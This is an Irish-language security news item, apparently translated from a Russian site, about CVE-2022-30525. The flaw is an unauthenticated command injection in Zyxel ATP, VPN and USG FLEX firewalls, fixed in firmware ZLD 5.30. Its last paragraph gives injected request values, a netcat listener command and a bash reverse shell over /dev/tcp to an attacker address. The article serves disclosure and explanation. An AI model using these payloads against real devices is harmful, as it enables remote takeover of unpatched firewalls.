Leochaileacht i mballaí dóiteáin Zyxel a cheadaíonn forghníomhú cód gan fíordheimhniú

Aithníodh leochaileacht ríthábhachtach (CVE-2022-30525) i bhfeistí Zyxel den tsraith ATP, VPN agus USG FLEX, atá deartha chun oibriú ballaí dóiteáin, IDS agus VPN a eagrú i bhfiontair, rud a ligeann d'ionsaitheoir seachtrach cód a fhorghníomhú ar an gléas gan cearta úsáideora gan fíordheimhniú. Chun ionsaí a dhéanamh, caithfidh ionsaitheoir a bheith in ann iarratais a sheoladh chuig an ngléas ag baint úsáide as an bprótacal HTTP/HTTPS. Tá an leochaileacht socraithe ag Zyxel sa nuashonrú firmware ZLD 5.30. De réir sheirbhís Shodan, faoi láthair tá 16213 feiste a d’fhéadfadh a bheith leochaileach ar an ngréasán domhanda a ghlacann le hiarratais trí HTTP/HTTPS.

Déantar an oibríocht trí orduithe atá saindeartha a sheoladh chuig an láimhseálaí gréasáin /ztp/cgi-bin/handler, inrochtana gan fíordheimhniú. Is í an fhadhb is cúis leis an easpa glantacháin chuí ar pharaiméadair iarratais nuair a bhíonn orduithe á bhforghníomhú ar an gcóras ag baint úsáide as an nglao os.system a úsáidtear sa leabharlann lib_wan_settings.py agus a fhorghníomhaítear le linn oibriú setWanPortSt a phróiseáil.

Mar shampla, d’fhéadfadh ionsaitheoir an teaghrán “; ping 192.168.1.210;" as a dtiocfaidh forghníomhú an ordaithe “ping 192.168.1.210” ar an gcóras. Chun rochtain a fháil ar an bhlaosc ordaithe, is féidir leat “nc -lvnp 1270” a rith ar do chóras, agus ansin nasc droim ar ais a thionscnamh trí iarratas a sheoladh chuig an ngléas leis an '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Foinse: oscailtenet.ru

Add a comment